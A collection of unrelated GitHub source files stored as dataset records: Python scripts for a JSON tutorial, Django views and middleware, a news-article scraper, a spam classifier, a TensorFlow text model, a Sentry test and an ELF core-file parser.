bg=primary, fg=white,anchor='w')\r\nfinishedLabel.place(relx=middle, rely=0.93, anchor=CENTER)\r\nfinishedLabel['font'] = finishedFont\r\n\r\nmainloop()\r\n","repo_name":"alessandrobelottidev/DuplicatesCleaner","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2177,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"77"} +{"seq_id":"32681008457","text":"import json\n\ndata = {\n \"details1\": {\n \"name\": \"YxZ\",\n \"subject\": \"Engineering\",\n \"City\": \"Pune\"\n },\n \"details2\": {\n \"name\": \"AcB\",\n \"subject\": \"Science\",\n \"City\": \"Chennai\"\n }\n}\n\nif __name__ == '__main__':\n\n # Opens the json file in write mode to overwrite the data\n with open('sample.json', 'w') as f:\n \"\"\"Serialization is the process wherein we \\\n convert the data type of the raw data into a JSON format.\n \"\"\"\n json.dump(data, f, indent=4, separators=(',', ': '))\n\n # Opens the json file in read mode to dump data, throws an error\n \"\"\"with open('sample.json', 'r') as f:\n json.dump(data, f)\n \"\"\"\n with open('sample.json', 'r+') as f:\n \"\"\"with deserialization, we can easily convert\\\n the JSON data into the default/native data type which is usually a dictionary.\n \"\"\"\n a = json.load(f)\n print(a, '\\n')\n for item in a:\n print(a[item]['name'])\n\n with open('sample.json', 'a') as f:\n json.dump({\"name\": \"John\", \"age\": 30}, f)\n json.dump([\"apple\", \"bananas\"], f)\n print(json.dumps((\"apple\", \"bananas\")))\n print(json.dumps(\"hello\"))\n print(json.dumps(42))\n print(json.dumps(31.76))\n print(json.dumps(True))\n print(json.dumps(False))\n 
print(json.dumps(None))\n","repo_name":"divyaChandran10/my_new_project","sub_path":"May16_jsonFiles/Trial.py","file_name":"Trial.py","file_ext":"py","file_size_in_byte":1392,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"11842105648","text":"#!/usr/bin/env python3\n\n#import\n#import math\n#import numpy as np\nN = int(input())\n\none = []\nzero = []\n\nfor _ in range(N):\n S = input()\n\n if S[0] == \"!\":\n one.append(S[1:])\n else:\n zero.append(S)\n\none.sort()\nzero.sort()\n\ni = 0; j = 0\n\nwhile i < len(one) and j < len(zero):\n if one[i] == zero[j]:\n print(one[i])\n exit()\n\n if one[i] < zero[j]:\n i += 1\n else:\n j += 1\n\nprint(\"satisfiable\")\n\n\n\n","repo_name":"Yukikazari/kyoupuro","sub_path":".提出一覧/AtCoder/abc187/c/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":449,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"34908492548","text":"\"\"\"Middleware used by Reversion.\"\"\"\n\nfrom __future__ import unicode_literals\n\nfrom django.core.exceptions import ImproperlyConfigured\n\nfrom reversion.revisions import revision_context_manager\n\n\nREVISION_MIDDLEWARE_FLAG = \"reversion.revision_middleware_active\"\n\n\nclass RevisionMiddleware(object): # pragma: no cover\n\n \"\"\"Wraps the entire request in a revision.\"\"\"\n\n def process_request(self, request):\n \"\"\"Starts a new revision.\"\"\"\n if request.META.get(REVISION_MIDDLEWARE_FLAG, False):\n raise ImproperlyConfigured(\"RevisionMiddleware can only be included in MIDDLEWARE_CLASSES once.\")\n request.META[REVISION_MIDDLEWARE_FLAG] = True\n revision_context_manager.start()\n\n def _close_revision(self, request):\n \"\"\"Closes the revision.\"\"\"\n if request.META.get(REVISION_MIDDLEWARE_FLAG, False):\n del request.META[REVISION_MIDDLEWARE_FLAG]\n revision_context_manager.end()\n\n def process_response(self, request, response):\n \"\"\"Closes the revision.\"\"\"\n # look to see if the session has been accessed before looking for user to stop Vary: Cookie\n if hasattr(request, 'session') and request.session.accessed \\\n and hasattr(request, \"user\") and request.user is not None and request.user.is_authenticated() \\\n and revision_context_manager.is_active():\n revision_context_manager.set_user(request.user)\n self._close_revision(request)\n return response\n\n def process_exception(self, request, exception):\n \"\"\"Closes the revision.\"\"\"\n revision_context_manager.invalidate()\n self._close_revision(request)\n","repo_name":"mudong1991/mudong_blog","sub_path":"blog_project_venv/Lib/site-packages/reversion/middleware.py","file_name":"middleware.py","file_ext":"py","file_size_in_byte":1670,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"77"} +{"seq_id":"23999999123","text":"import eventregistry as ER\nimport datetime\nimport pandas as pd\nimport time\nfrom eventregistry import *\n\ner = ER.EventRegistry(apiKey=\"5ba73408-ea81-459b-abf4-6fedd8cb8ec6\") # dany\n#er = ER.EventRegistry(apiKey = \"5fed3642-762a-4abc-aabf-ac6213c1bcea\") #philipp\n#er = ER.EventRegistry(apiKey = \"7571801b-6710-4166-90cc-9c5352ddeedd\") #andi\n#er = ER.EventRegistry(apiKey=\"1b673182-c9e4-4554-90cf-d082a0bd6b53\") # Hendrik?\nanalytics = ER.Analytics(er)\n\n# DEFINE companies\ncompanies = ['Samsung', 'BASF', 'Apple', 'Tesla', 'Airbus', 'Bayer', 'BMW', 'Telefonica', 'Google', 'Allianz', 'Total']\n\n# DEFINE start and end date\nstartDate = 
datetime.date(2018, 7, 18)\nendDate = datetime.date(2018, 7, 18)\n# Get all Business Days in Period\ntime_frame = pd.bdate_range(startDate, endDate)\n\n\n# Set maximum number of articles per day\nnumber_of_articles = 50\n\n# DEFINE df results columns\nresult = dict()\n\nfor company in companies:\n print(\"- Starting article processing for company :\", company)\n # Dictionary\n result.update({company:{}})\n for day in time_frame:\n # QUERY articles related to current company\n print(\"-- Start article processing for Date: \", day)\n\n result[company].update({day.strftime('%Y-%m-%d'): []})\n q = ER.QueryArticlesIter(conceptUri=er.getConceptUri(company), lang=\"eng\", dateStart=day.date(),\n dateEnd=day.date())\n articles = q.execQuery(er, sortBy=[\"date\", \"sourceImportance\"], sortByAsc=False, lang=[\"eng\"],\n returnInfo=ReturnInfo(\n articleInfo=ArticleInfoFlags(socialScore=True, originalArticle=True, categories=True,\n concepts=True, sentiment=True, duplicateList=True)),\n maxItems=number_of_articles, articleBatchSize=50)\n\n\n\n # Iterate over all articles about the current company\n # Calculate Sentiment and save in day`s column and index\n while True:\n try:\n article = next(articles)\n except AssertionError:\n print(\"Article throws assertion error!\")\n continue\n except StopIteration:\n break\n\n result[company][day.strftime('%Y-%m-%d')].append(article['body'])\n\n\n print(\"- Company fully processed : \", company)\n\n\n\nprint(\"All Articles fully processed\")\nprint(\"Save Data to csv\")\nPATH = \"data/article_bodies_\" + str(startDate) + \"_\" + str(endDate) + \".json\"\n\nimport json\nwith open(PATH, 'w') as fp:\n json.dump(result, fp)\n","repo_name":"kosnil/kd-seminar","sub_path":"er_body_data/get_article_bodies.py","file_name":"get_article_bodies.py","file_ext":"py","file_size_in_byte":2597,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"32848011723","text":"from django.contrib import messages\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib.auth.mixins import PermissionRequiredMixin\nfrom django.shortcuts import get_object_or_404, redirect, render\nfrom django.utils.decorators import method_decorator\nfrom django.views import View\n\nfrom dashboard.models import Klass, SessionReport, StudentPromotionHistory\nfrom setup.models import Attitude, Conduct, Interest, Remark, SchoolSession\n\n\nclass ClassTeacherSessionReportFilterView(PermissionRequiredMixin, View):\n template_name = \"dashboard/class_teacher_report/report_filter.html\"\n permission_required = [\n \"setup.change_class_teacher_remark\",\n ]\n\n @method_decorator(login_required(login_url=\"accounts:login\"))\n def get(self, request):\n sessions = SchoolSession.objects.all().order_by(\"-start_date\")\n\n if not request.user.has_perm(\"setup.manage_other_report\"):\n if hasattr(request.user, \"staff\"):\n classes = request.user.staff.classes.all()\n else:\n classes = Klass.objects.none()\n else:\n classes = Klass.objects.all()\n\n context = {\n \"sessions\": sessions,\n \"classes\": classes.order_by(\"stage\"),\n }\n return render(request, self.template_name, context)\n\n\nclass ClassTeacherSessionReportDataView(PermissionRequiredMixin, View):\n template_name = \"dashboard/class_teacher_report/class_teacher_report_data.html\"\n permission_required = [\n \"setup.change_class_teacher_remark\",\n ]\n\n @method_decorator(login_required(login_url=\"accounts:login\"))\n def get(self, request):\n session_id = 
request.GET.get(\"session\") or -1\n class_id = request.GET.get(\"class\") or -1\n session = SchoolSession.objects.filter(id=session_id).first()\n klass = Klass.objects.filter(id=class_id).first()\n\n if not (klass and session):\n messages.error(request, \"Please select a session and class\")\n return redirect(\"dashboard:class_teacher_report_filter\")\n\n promotion_history = StudentPromotionHistory.objects.filter(\n session__academic_year=session.academic_year, new_class=klass)\n students = promotion_history.values_list(\"student\", flat=True)\n\n for student_id in students:\n SessionReport.objects.get_or_create(student_id=student_id,\n klass=klass,\n session=session)\n\n reports = SessionReport.objects.filter(student__in=students,\n student__deleted=False,\n klass=klass,\n session=session)\n context = {\n \"reports\": reports,\n \"session\": session,\n \"class\": klass,\n \"attitudes\": Attitude.objects.all().order_by(\"text\"),\n \"interests\": Interest.objects.all().order_by(\"text\"),\n \"conducts\": Conduct.objects.all().order_by(\"text\"),\n \"remarks\": Remark.objects.all().order_by(\"text\"),\n }\n return render(request, self.template_name, context)\n\n @method_decorator(login_required(login_url=\"accounts:login\"))\n def post(self, request):\n total_attendance = request.POST.get(\"total_attendance\")\n report_ids = request.POST.getlist(\"report_ids\")\n attendance_list = request.POST.getlist(\"attendance\")\n attitudes = request.POST.getlist(\"attitudes\")\n interests = request.POST.getlist(\"interests\")\n conducts = request.POST.getlist(\"conducts\")\n remarks = request.POST.getlist(\"remarks\")\n classes = request.POST.getlist(\"classes\")\n promotions = request.POST.getlist(\"promotions\")\n\n # Validating user input\n if not (str(total_attendance).isdigit()):\n messages.error(request, \"Invalid total attendance.\")\n return redirect(request.META.get(\"HTTP_REFERER\"))\n\n if len(attendance_list) != len(attitudes) != len(conducts) != len(\n report_ids) != len(classes) != len(promotions) != len(\n remarks) != len(interests):\n messages.warning(\n request,\n \"Invalid record. 
Please do not leave any records half filled.\")\n return redirect(request.META.get(\"HTTP_REFERER\"))\n\n # Check class teacher permissions\n has_class_teacher_permission = True\n class_ids = set(classes)\n teacher_klasses = Klass.objects.filter(\n id__in=class_ids, class_teacher__user=request.user)\n if len(teacher_klasses) != len(class_ids):\n has_class_teacher_permission = False\n\n # Updating records\n for report_id, class_id, attendance, attitude, conduct, interest, remark, promotion in zip(\n report_ids, classes, attendance_list, attitudes, conducts,\n interests, remarks, promotions):\n\n report = get_object_or_404(SessionReport, id=report_id)\n klass = get_object_or_404(Klass, id=class_id)\n\n # Check whether user has the permission to modify this record.\n if not (request.user.has_perm(\"setup.manage_other_report\")\n or has_class_teacher_permission\n ): # Administrative permission.\n messages.error(\n request,\n \"You do not have permission to view or modify this subject record.\"\n )\n return redirect(request.META.get(\"HTTP_REFERER\"))\n\n # Updating record\n report.total_attendance = total_attendance\n report.attendance = attendance\n report.klass = klass\n report.attitude_id = attitude\n report.conduct_id = conduct\n report.interest_id = interest\n report.promotion = promotion\n report.class_teacher_remark_id = remark\n report.save()\n\n messages.success(request, \"Record successfully updated.\")\n return redirect(request.META.get(\"HTTP_REFERER\"))\n","repo_name":"dodziraynard/curie","sub_path":"app/dashboard/views/class_teacher_report.py","file_name":"class_teacher_report.py","file_ext":"py","file_size_in_byte":6138,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"77"} +{"seq_id":"72265617848","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\nimport numpy as np\nimport pandas as pd\nimport seaborn as sn\nimport matplotlib.pyplot as plt\nfrom sklearn.feature_extraction.text import TfidfVectorizer, CountVectorizer\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import roc_auc_score, f1_score, confusion_matrix\nfrom sklearn.naive_bayes import MultinomialNB\nfrom wordcloud import WordCloud\n\n\n# In[2]:\n\n\n# https://www.kaggle.com/uciml/sms-spam-collection-dataset\nget_ipython().system('wget https://lazyprogrammer.me/course_files/spam.csv')\n\n\n# In[3]:\n\n\ndf = pd.read_csv(\"spam.csv\", encoding='ISO-8859-1')\n#find contains some invalid chars\n#depending on which version of pandas you have you may face an error\n#so the encoding is not neccessary but the thing is being safe rather than sorry -Kiavash qoutes\n\n\n# In[4]:\n\n\ndf.head()\n\n\n# In[5]:\n\n\ndf = df.drop([\"Unnamed: 2\", \"Unnamed: 3\", \"Unnamed: 4\"], axis = 1)\n\n\n# In[6]:\n\n\ndf.head()\n\n\n# In[7]:\n\n\ndf.columns = ['labels', 'data']\n\n\n# In[8]:\n\n\ndf.head()\n\n\n# In[9]:\n\n\ndf['labels'].hist()\n\n\n# In[10]:\n\n\ndf['b_labels'] = df['labels'].map({'ham':0, 'spam':1})\nY = df['b_labels'].to_numpy()\nY\n\n\n# In[11]:\n\n\ndf_train, df_test, Ytrain, Ytest = train_test_split(df['data'], Y, test_size = 0.33)\n\n\n# In[12]:\n\n\n#brute forcing through the errors, why database bad? 
:'(\nfeaturizer = TfidfVectorizer(decode_error='ignore')\nXtrain = featurizer.fit_transform(df_train)\nXtest = featurizer.transform(df_test)\n\n\n# In[13]:\n\n\nXtrain\n\n\n# In[14]:\n\n\nmodel = MultinomialNB()\nmodel.fit(Xtrain, Ytrain)\nprint(\"train acc: \",model.score(Xtrain, Ytrain))\nprint(\"test acc: \",model.score(Xtest,Ytest))\n\n\n# In[15]:\n\n\nPtrain = model.predict(Xtrain)\nPtest = model.predict(Xtest)\nprint(\"train F1: \", f1_score(Ytrain, Ptrain))\nprint(\"test F1: \", f1_score(Ytest, Ptest))\n\n\n# In[16]:\n\n\nProb_train = model.predict_proba(Xtrain)[:,1]\nProb_test = model.predict_proba(Xtest)[:,1]\nprint(\"train AUC:\", roc_auc_score(Ytrain, Prob_train))\nprint(\"test AUC:\", roc_auc_score(Ytest, Prob_test))\n\n\n# In[17]:\n\n\ncm = confusion_matrix(Ytrain, Ptrain)\ncm\n\n\n# In[18]:\n\n\n#This is for representation only - ignore if you don't understand (no big deal)\ndef plot_cm(cm):\n classes = ['ham', 'spam']\n df_cm = pd.DataFrame(cm, index = classes, columns = classes)\n ax = sn.heatmap(df_cm, annot = True, fmt = 'g')\n ax.set_xlabel(\"Predicted\")\n ax.set_ylabel(\"Target\")\nplot_cm(cm)\n\n\n# In[19]:\n\n\ncm_test = confusion_matrix(Ytest, Ptest)\nplot_cm(cm_test)\n\n\n# In[20]:\n\n\ndef visualize(label):\n words = ''\n for msg in df[df['labels'] == label]['data']:\n #see what i did? :))\n msg = msg.lower()\n words += msg + ' '\n wordcloud = WordCloud(width=600, height=400).generate(words)\n plt.imshow(wordcloud)\n plt.axis('off')\n plt.show()\n\n\n# In[21]:\n\n\nvisualize('spam')\n\n\n# In[22]:\n\n\nvisualize('ham')\n\n","repo_name":"itsjustkia/spam-detector","sub_path":"Spam-Detection (1).py","file_name":"Spam-Detection (1).py","file_ext":"py","file_size_in_byte":2844,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"33523373761","text":"'''\n打包参考资料:https://www.cnblogs.com/dcb3688/p/4211390.html\n'''\nimport os\n\napp_path = os.path.abspath(os.path.join(os.path.abspath(__file__), \"..\"))\nprint(\"Package App Path==>\", app_path)\n#order = \"pyinstaller.exe -F -w {}/app.py --upx-dir={}\".format(app_path, os.path.join(app_path, \"upx308w\"))\norder = \"pyinstaller.exe -F -w {}/app.py \".format(app_path)\nprint(\"Package Order==>\", order)\nos.system(order)","repo_name":"PatchLion/PyQt5ProjectTemplate","sub_path":"package.py","file_name":"package.py","file_ext":"py","file_size_in_byte":417,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"73989825526","text":"from unittest import mock\n\nimport responses\n\nfrom sentry.notifications.notifications.integration_nudge import (\n MESSAGE_LIBRARY,\n IntegrationNudgeNotification,\n)\nfrom sentry.testutils.cases import SlackActivityNotificationTest\nfrom sentry.testutils.helpers.slack import get_attachment_no_text, send_notification\nfrom sentry.types.integrations import ExternalProviders\n\nSEED = 0\n\n\nclass SlackNudgeNotificationTest(SlackActivityNotificationTest):\n @responses.activate\n @mock.patch(\"sentry.notifications.notify.notify\", side_effect=send_notification)\n def test_nudge(self, mock_func):\n notification = IntegrationNudgeNotification(\n self.organization,\n recipient=self.user,\n provider=ExternalProviders.SLACK,\n seed=SEED,\n )\n\n with self.tasks():\n notification.send()\n\n attachment = get_attachment_no_text()\n assert attachment[\"text\"] == MESSAGE_LIBRARY[SEED].format(provider=\"Slack\")\n assert len(attachment[\"actions\"]) == 1\n assert 
attachment[\"actions\"][0][\"action_id\"] == \"enable_notifications\"\n assert attachment[\"actions\"][0][\"name\"] == \"Turn on personal notifications\"\n assert attachment[\"actions\"][0][\"value\"] == \"all_slack\"\n","repo_name":"gms-ws-sandbox/sentry","sub_path":"tests/sentry/integrations/slack/notifications/test_nudge.py","file_name":"test_nudge.py","file_ext":"py","file_size_in_byte":1259,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"15108346679","text":"# -*- coding: utf-8 -*-\n\"\"\"\n@author: kebo\n@contact: kebo0912@outlook.com\n\n@version: 1.0\n@file: model.py\n@time: 2020/4/26 0:05\n\n这一行开始写关于本文件的说明与解释\n\n\n\"\"\"\nimport json\nimport tensorflow as tf\n\nfrom dataset_reader import MAX_LEN, MAX_WORDS, ds_train, ds_test\n\n\nclass CnnModel(tf.keras.models.Model):\n def __init__(self):\n super(CnnModel, self).__init__()\n\n def build(self, input_shape):\n self.embedding = tf.keras.layers.Embedding(MAX_WORDS, 7, input_length=MAX_LEN)\n self.conv_1 = tf.keras.layers.Conv1D(16, kernel_size=5, name=\"conv_1\", activation=\"relu\")\n self.pool = tf.keras.layers.MaxPool1D()\n self.conv_2 = tf.keras.layers.Conv1D(128, kernel_size=2, name=\"conv_2\", activation=\"relu\")\n self.flatten = tf.keras.layers.Flatten()\n self.dense = tf.keras.layers.Dense(1, activation=\"sigmoid\")\n super(CnnModel, self).build(input_shape)\n\n def call(self, x):\n x = self.embedding(x)\n x = self.conv_1(x)\n x = self.pool(x)\n x = self.conv_2(x)\n x = self.pool(x)\n x = self.flatten(x)\n x = self.dense(x)\n return x\n\n\nclass Trainer:\n def __init__(self):\n self.model = CnnModel()\n self.model.build(input_shape=(None, MAX_LEN))\n self.model.summary()\n\n self.optimizer = tf.keras.optimizers.Nadam()\n self.loss_func = tf.keras.losses.BinaryCrossentropy()\n\n self.train_loss = tf.keras.metrics.Mean(name='train_loss')\n self.train_metric = tf.keras.metrics.BinaryAccuracy(name='train_accuracy')\n\n self.valid_loss = tf.keras.metrics.Mean(name='valid_loss')\n self.valid_metric = tf.keras.metrics.BinaryAccuracy(name='valid_accuracy')\n\n # 打印时间分割线\n @classmethod\n @tf.function\n def print_bar(cls):\n today_ts = tf.timestamp() % (24 * 60 * 60)\n\n hour = tf.cast(today_ts // 3600 + 8, tf.int32) % tf.constant(24)\n mini_te = tf.cast((today_ts % 3600) // 60, tf.int32)\n second = tf.cast(tf.floor(today_ts % 60), tf.int32)\n\n def time_format(m):\n if tf.strings.length(tf.strings.format(\"{}\", m)) == 1:\n return tf.strings.format(\"0{}\", m)\n else:\n return tf.strings.format(\"{}\", m)\n\n time_string = tf.strings.join([time_format(hour), time_format(mini_te),\n time_format(second)], separator=\":\")\n tf.print(\"==========\" * 8 + time_string)\n\n @tf.function\n def train_step(self, features, labels):\n with tf.GradientTape() as tape:\n predictions = self.model(features, training=True)\n loss = self.loss_func(labels, predictions)\n gradients = tape.gradient(loss, self.model.trainable_variables)\n self.optimizer.apply_gradients(zip(gradients, self.model.trainable_variables))\n\n self.train_loss.update_state(loss)\n self.train_metric.update_state(labels, predictions)\n\n @tf.function\n def valid_step(self, features, labels):\n predictions = self.model(features, training=False)\n batch_loss = self.loss_func(labels, predictions)\n self.valid_loss.update_state(batch_loss)\n self.valid_metric.update_state(labels, predictions)\n\n def train_model(self, epochs, train_data, valid_data):\n for epoch in tf.range(1, epochs + 1):\n\n for features, labels in 
train_data:\n self.train_step(features, labels)\n\n for features, labels in valid_data:\n self.valid_step(features, labels)\n\n # 此处logs模板需要根据metric具体情况修改\n logs = 'Epoch={},Loss:{},Accuracy:{},Valid Loss:{},Valid Accuracy:{}'\n\n if epoch % 1 == 0:\n self.print_bar()\n tf.print(tf.strings.format(logs,\n (epoch, self.train_loss.result(), self.train_metric.result(),\n self.valid_loss.result(),\n self.valid_metric.result())))\n tf.print(\"\")\n\n self.train_loss.reset_states()\n self.valid_loss.reset_states()\n self.train_metric.reset_states()\n self.valid_metric.reset_states()\n # self.model.save_weights('./data/output/keras_model_weight.h5')\n # model_json = self.model.to_json()\n # json.dump(model_json, open(\"./data/output/model_json.json\", \"w\"), indent=4)\n self.model.save('./data/output', save_format=\"tf\")\n\n print('export saved model.')\n\n\nif __name__ == '__main__':\n trainer = Trainer()\n trainer.train_model(epochs=5, train_data=ds_train, valid_data=ds_test)\n","repo_name":"bo-ke/algorithm_support","sub_path":"frameworks/tensorflow/modeling_process/example_text_data_modeling/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":4703,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"18305451958","text":"#######################################################################\n# imports #\n#######################################################################\n\nfrom sqlalchemy.orm import sessionmaker\n\nfrom models import Courses, db_connect, create_course_table\n\n#######################################################################\n# classes #\n#######################################################################\n\nclass TonScraperPipeline(object):\n def __init__(self):\n engine = db_connect()\n create_course_table(engine)\n self.Session = sessionmaker(bind=engine)\n\n def process_item(self, item, spider):\n session = self.Session()\n course = Courses(**item)\n\n try:\n session.add(course)\n session.commit()\n except:\n session.rollback()\n raise\n finally:\n session.close()\n\n return item\n","repo_name":"textbookornot/scrapers","sub_path":"ton_scraper/pipelines.py","file_name":"pipelines.py","file_ext":"py","file_size_in_byte":1024,"program_lang":"python","lang":"de","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"16130215810","text":"\nfrom __future__ import print_function\n\nimport os\nfrom mmap import mmap, ACCESS_READ, ACCESS_WRITE, PAGESIZE\nimport struct\n\nimport andb.py23 as py23\n\nclass Enum:\n \n @classmethod\n def Name(cls, num):\n for i in dir(cls):\n v = getattr(cls, i)\n if isinstance(v, int):\n if v == num:\n return i\n return \"unknown(0x%x)\" % num\n\ndef ReadCStr(sec):\n \"\"\" read section offset as c-style string \"\"\"\n sz = []\n while True:\n c = sec.Read(1)\n c = c.decode('utf-8')\n #c = str(c, 'utf-8')\n if c == chr(0):\n return \"\".join(sz) \n sz.append(c)\n\ndef roundup(x, up):\n y = (x - 1) // 4 + 1\n return y*up \n\n\nclass Elf:\n \n # file opened\n _I_file = None\n \n # mmap fd \n _I_mmap = None\n \n # instance base offset from mmap front\n _I_offset = None \n\n # last saved offset\n _saved_offset = 0\n\n # elf header\n _ehdr = None\n\n # program headers\n _phdrs = None\n\n # section headers\n _shdrs = None\n\n # string table\n _strtab = None\n\n # notes\n _notes = None\n\n class SHTYPE(Enum):\n \"\"\"Section Header Type\n \"\"\"\n NULL_TYPE = 0\n PROGBITS = 1\n SYMTAB = 2\n STRTAB = 3\n RELA = 4\n HASH = 5\n DYNAMIC = 6\n NOTE = 7\n 
NOBITS = 8\n REL = 9\n SHLIB = 10\n DYNSYM = 11\n INIT_ARRAY = 14\n FINI_ARRAY = 15\n PREINIT_ARRAY = 16\n GROUP = 17\n SYMTAB_SHNDX = 18\n\n class PHTYPE(Enum):\n \"\"\"Program Header Type\n \"\"\"\n NOTE = 0x00000004\n\n class NTYPE(Enum):\n \"\"\"Note Header Type\n \"\"\"\n NT_GNU_BUILD_ID = 3\n NT_PRSTATUS = 1\n NT_PRFPREG = 2\n NT_PRPSINFO = 3\n NT_TASKSTRUCT = 4\n NT_AUXV = 6\n NT_SIGINFO = 0x53494749\n NT_FILE = 0x46494c45\n \n class EMTYPE(Enum):\n EM_X86_64 = 62\n EM_AARCH64 = 183\n\n class Section:\n \"\"\" represents a Section in Elf file. \"\"\"\n\n def __init__(self, elf, name, offset, size):\n self._elf = elf\n self._name = name\n self._offset = offset\n self._size = size\n\n def Seek(self, offset):\n off = self._offset + offset\n self._elf._I_mmap.seek(off)\n\n def Tell(self):\n off = self._elf._I_mmap.tell()\n return off - self._offset\n\n def Read(self, size):\n return self._elf._I_mmap.read(size) \n\n def ReadU8(self):\n return struct.unpack('B', self.Read(1))[0] \n \n def ReadU16(self):\n return struct.unpack('H', self.Read(2))[0] \n \n def ReadU32(self):\n return struct.unpack('I', self.Read(4))[0] \n \n def ReadU64(self):\n return struct.unpack('Q', self.Read(8))[0] \n \n def ReadI8(self):\n return struct.unpack('b', self.Read(1))[0] \n \n def ReadI16(self):\n return struct.unpack('h', self.Read(2))[0] \n \n def ReadI32(self):\n return struct.unpack('i', self.Read(4))[0] \n \n def ReadI64(self):\n return struct.unpack('q', self.Read(8))[0] \n \n def ReadUleb128(self):\n \"\"\" Extract a ULEB128 value \"\"\"\n byte = self.ReadU8()\n if byte & 0x80:\n result = byte & 0x7f\n shift = 7\n while byte & 0x80:\n byte = self.ReadU8()\n result |= (byte & 0x7f) << shift\n shift += 7\n return result\n else:\n return byte\n\n def ReadSleb128(self):\n \"\"\" Extract a SLEB128 value \"\"\"\n result = 0\n shift = 0\n size = 64\n byte = 0\n bytecount = 0\n while 1:\n bytecount += 1\n byte = self.ReadU8()\n result |= (byte & 0x7f) << shift\n shift += 7\n if (byte & 0x80) == 0:\n break\n # Sign bit of byte is 2nd high order bit (0x40)\n if (shift < size and (byte & 0x40)):\n result |= - (1 << shift)\n return result\n\n class StrTab(Section):\n \"\"\" strtab is a special secion holds all elf strings \"\"\" \n\n def Str(self, index):\n self.Seek(index)\n return ReadCStr(self) \n\n \"\"\"Begin Elf methods.\n \"\"\"\n def Seek(self, offset):\n \"\"\"Seek in relative offset with retore.\n \"\"\"\n m = self._I_mmap\n self._saved_offset = m.tell()\n x = self._I_offset + offset\n m.seek(x)\n return m\n\n def Restore(self):\n \"\"\"Retore last seek.\n \"\"\"\n m = self._I_mmap\n m.seek(self._saved_offset)\n return m\n\n def GetEhdr(self):\n \"\"\"parse elf header \n \"\"\"\n if self._ehdr:\n return self._ehdr\n\n sd = '2HI3QI6H'\n size = struct.calcsize(sd)\n\n m = self.Seek(16) \n t = struct.unpack(sd, m.read(size))\n elfhdr = {}\n elfhdr['e_type']= t[0]\n elfhdr['e_machine'] = t[1]\n elfhdr['e_version'] = t[2]\n elfhdr['e_entry'] = t[3]\n elfhdr['e_phoff'] = t[4]\n elfhdr['e_shoff'] = t[5]\n elfhdr['e_flags'] = t[6]\n elfhdr['e_ehsize'] = t[7]\n elfhdr['e_phentsize'] = t[8]\n elfhdr['e_phnum'] = t[9]\n elfhdr['e_shentsize'] = t[10]\n elfhdr['e_shnum'] = t[11]\n elfhdr['e_shstrndx'] = t[12]\n self.Restore() \n \n self._ehdr = elfhdr\n return elfhdr \n\n def GetShdrs(self):\n \"\"\"parse all sections header \n \"\"\"\n if self._shdrs:\n return self._shdrs\n\n elfhdr = self.GetEhdr()\n off = elfhdr['e_shoff'] \n num = elfhdr['e_shnum']\n size = elfhdr['e_shentsize']\n \n sechdrs = []\n m = 
self.Seek(off)\n        for i in range(num):\n            t = struct.unpack('2I4Q2I2Q', m.read(size))\n            sec = {}\n            sec['sh_name'] = t[0]\n            sec['sh_type'] = t[1]\n            sec['sh_flags'] = t[2]\n            sec['sh_addr'] = t[3]\n            sec['sh_offset'] = t[4]\n            sec['sh_size'] = t[5]\n            sec['sh_link'] = t[6]\n            sec['sh_info'] = t[7]\n            sec['sh_addralign'] = t[8]\n            sec['sh_entsize'] = t[9]\n            sechdrs.append(sec)\n        self.Restore()\n\n        self._shdrs = sechdrs\n        return sechdrs\n\n    def GetPhdrs(self):\n        \"\"\" parse all program headers \"\"\"\n\n        if self._phdrs:\n            return self._phdrs\n\n        elfhdr = self.GetEhdr()\n        off = elfhdr['e_phoff']\n        num = elfhdr['e_phnum']\n        size = elfhdr['e_phentsize']\n        \n        proghdrs = []\n        m = self.Seek(off)\n        for i in range(num):\n            # uint32_t p_type;\n            # uint32_t p_flags;\n            # Elf64_Off p_offset;\n            # Elf64_Addr p_vaddr;\n            # Elf64_Addr p_paddr;\n            # uint64_t p_filesz;\n            # uint64_t p_memsz;\n            # uint64_t p_align;\n            t = struct.unpack('2I6Q', m.read(size))\n            hdr = {}\n            hdr['p_type'] = t[0]\n            hdr['p_flags'] = t[1]\n            hdr['p_offset'] = t[2]\n            hdr['p_vaddr'] = t[3]\n            hdr['p_paddr'] = t[4]\n            hdr['p_filesz'] = t[5]\n            hdr['p_memsz'] = t[6]\n            hdr['p_align'] = t[7]\n            proghdrs.append(hdr)\n        self.Restore()\n\n        self._phdrs = proghdrs\n        return proghdrs\n\n    def SecEntry(self):\n        \"\"\" The whole Elf shares one mmap, so SecEntry() is used to switch sections:\n            save the current position, then restore it after the Section is finished.\n\n            e.g.\n            save = SecEntry()\n            sec.Seek(xxx)\n            SecExit(save)\n        \"\"\"\n        return self._I_mmap.tell()\n\n    def SecExit(self, save):\n        self._I_mmap.seek(save)\n\n    def GetSection(self, name):\n        \"\"\"get Section by name\n        \"\"\"\n        for s in self.GetShdrs():\n            sh_name = self._strtab.Str(s['sh_name'])\n            if sh_name == name:\n                return Elf.Section(self, sh_name, s['sh_offset'], s['sh_size'])\n        return None\n\n    # TODO: reform into an independent class to represent it\n    def GetNotes(self):\n        if self._notes:\n            return self._notes\n\n        phNoteHdr = None\n        for p in self.GetPhdrs():\n            if p['p_type'] == Elf.PHTYPE.NOTE:\n                phNoteHdr = p\n        